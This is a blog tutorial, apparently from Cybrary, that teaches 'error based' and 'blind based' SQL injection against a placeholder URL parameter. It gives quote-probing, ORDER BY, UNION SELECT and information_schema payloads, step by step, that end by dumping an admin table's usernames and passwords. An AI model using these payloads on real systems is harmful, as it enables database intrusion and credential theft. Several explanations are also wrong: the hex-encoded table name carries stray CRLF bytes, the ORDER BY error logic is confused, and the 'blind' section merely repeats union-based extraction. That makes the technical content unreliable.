Home 0P3N Blog What You Should Know About SQL Injection
Ready to Start Your Career?
Create Free Account
By: Rana Daniyal Khan
September 17, 2015

What You Should Know About SQL Injection

By: Rana Daniyal Khan
September 17, 2015
By: Rana Daniyal Khan
September 17, 2015
What You Should Know About SQL Injection - CybrarySQL Injection:

SQL injection is a code injection technique, used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

Types :[-]Error based[-]Blind based [1]Error based:

In error based we used error through-ed by database to preform injection.

 
Let me show an example:Suppose we have a web app that has a database on the back end and it's fetching data from it.Like this website: www.website.com/index.php?id=84?id=84 means it's fetching something with the id 84 from a database and this is our way to communicate with the database. So let's go forward with these steps...(1) Finding if it's vulnerable.Put a single quote  at the end: www.website.com/index.php?id=84'If you receive an error like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use." Or something like that, it means that the web app is vulnerable to SQL injection.What's so good about getting this error message? The good thing is that we're able to get errors from the database. (2) Joining queries.Now, for joining queries put --+ at end like this: www.website.com/index.php?id=84' --+And, between this, we'll execute our query. (3) Find the number of columns.For this, we use order by or group by clauses to find a number of columns. But, there are two possibilities: do we have to leave our single quote( ' ) in here or do we have to remove it?How will I know?Simple...keep the tip below in mind:Tip:

If you run the order clause "correctly" - meaning with more columns in the database, you'll see an error like this "unknown column '100' in 'order clause'"

With this, we now know we have to remove the ( ' )  or notRun the order clause with a guess of the max number or columns like this: www.website.com/index.php?id=84' order by 100000000 --+Do we get an error like this?"unknown column '100000000' in 'order clause'"If no, then it means that we have to remove our  ( ' ) from the link - otherwise it should be here.We'll keep on guessing the numbers of columns randomly. Dude, how will I know that I've guessed the right number of columns??Simple.-if you exceed it, the database gives and error like "unknown column '100' in 'order clause'"-if you are below it, you'll see an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.'"- if you're on spot, then there's no error Suppose:1-www.website.com/index.php?id=84' order by 100 --+Error: "unknown column '100 in 'order clause'" 2-www.website.com/index.php?id=84' order by 8--+Error : "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"This means that number of columns are below 100 and greater then 8We try:2-www.website.com/index.php?id=84' order by 10 --+No error?? Bingo. This is the number we wanted. We have 10 columns. (4) Finding vulnerable column.We have to find out by which column we can print information. For that, we use union select. We'll do union select of 10 columns like this:www.website.com/index.php?id=84' union select 1,2,3,4,5,6,7,8,9,10 --+The vulnerable column will be printed on the web app (eg: if 3 ,6 ,9 are vulnerable they'll be printed on the web app. You can use any of them to print data; you can even use all of them.)If you don't get anything printed out - behind the ID number, some column name is hidden behind some content: www.website.com/index.php?id=-84' union select 1,2,3,4,5,6,7,8,9,10 --+Now that we've found vulnerable columns, we'll use them to print info from database. (5) Fetching dataLet's use vulnerable column 3 to print the database name: www.website.com/index.php?id=84' union select 1,2,database(),4,5,6,7,8,9,10 --+You can use other functions, too - like user() to print user data and version() to print the version of database.Let's use vulnerable column 6 to print the table name's in database: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()--+Suppose we got three tables:admin, users, pagesLet's use vulnerable column 6 to print column names from the admin table. For this, we have to convert the table name to hex first, then put it after table_name=(hexed table name here): www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a--+Suppose we got following columns:user, passWe can print data from them like: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin--+ [2] Blind based:There is no data printed on the web app by applying ( ' ) at the end of the URL. So, how can I know that it's also vulnerable?Easy.If you apply ( ' ) at the end of the URL and some text, object, picture - if anything got missed, then it's vulnerable to blind based injection. (1) Finding if it's vulnerable.Put a single quote at the end: www.website.com/index.php?id=84'Things got missed?  This means the web app is vulnerable to blind based SQL injection :) (2) Joining queries.For joining queries, put --+ at end like thatwww.website.com/index.php?id=84' --+And between this, we'll execute our query. (3) Finding the number of columns.For this, we use order by or group by clause to find the number of columns.There are two possibilities: do we have to leave our single quote ( ' ) in here or should we remove it?Tip : if  putting --+

www.website.com/index.php?id=84' --+

Brings things back to normal, meaning it returns all content, then it means we need (') - otherwise remove it.

"unknown column '100' in 'order clause'"We'll know if we have to remove ( ' )  or not.Run the order clause with guess of max number or columns. We'll keep on guessing the numbers of columns randomly. How will I know that I guessed the right number of columns?- if you exceed, the content is missing- if you're below, the content is missing- if you're on spot, then no content is missing :)Let's take a look...1-www.website.com/index.php?id=84' order by 100 --+*Content is missingit means number of columns are below2-www.website.com/index.php?id=84' order by 8--+*Content is missingIt means that number of columns are below 100 and greater then 8Try:2-www.website.com/index.php?id=84' order by 10 --+N0 content is missing? This is the number we wanted. We have 10 columns. (4) Finding vulnerable columnsWe have to find out by which column we can print information.As above, we use union select: www.website.com/index.php?id=84' union select 1,2,3,4,5,6,7,8,9,10 --+The vulnerable column will be printed on the web app (eg: if 3 ,6 ,9 are vulnerable, they will be printed on the web app. You can use any or all of them.) (5) Fetching dataLet's use vulnerable column 3 to print the database name:www.website.com/index.php?id=84' union select 1,2,database(),4,5,6,7,8,9,10 --+Let's usecolumn 6 to print table name's in database: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()--+If we got three tables:admin, users, pagesLet's use column 6 to print column name's from the admin table admin. We have to convert the table name to hex first then put it after table_name=(hexed table name here).www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a--+Suppose, we got following columns:user, passWe can print data from them like: www.website.com/index.php?id=84' union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin--+ :)Cheers
Request Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry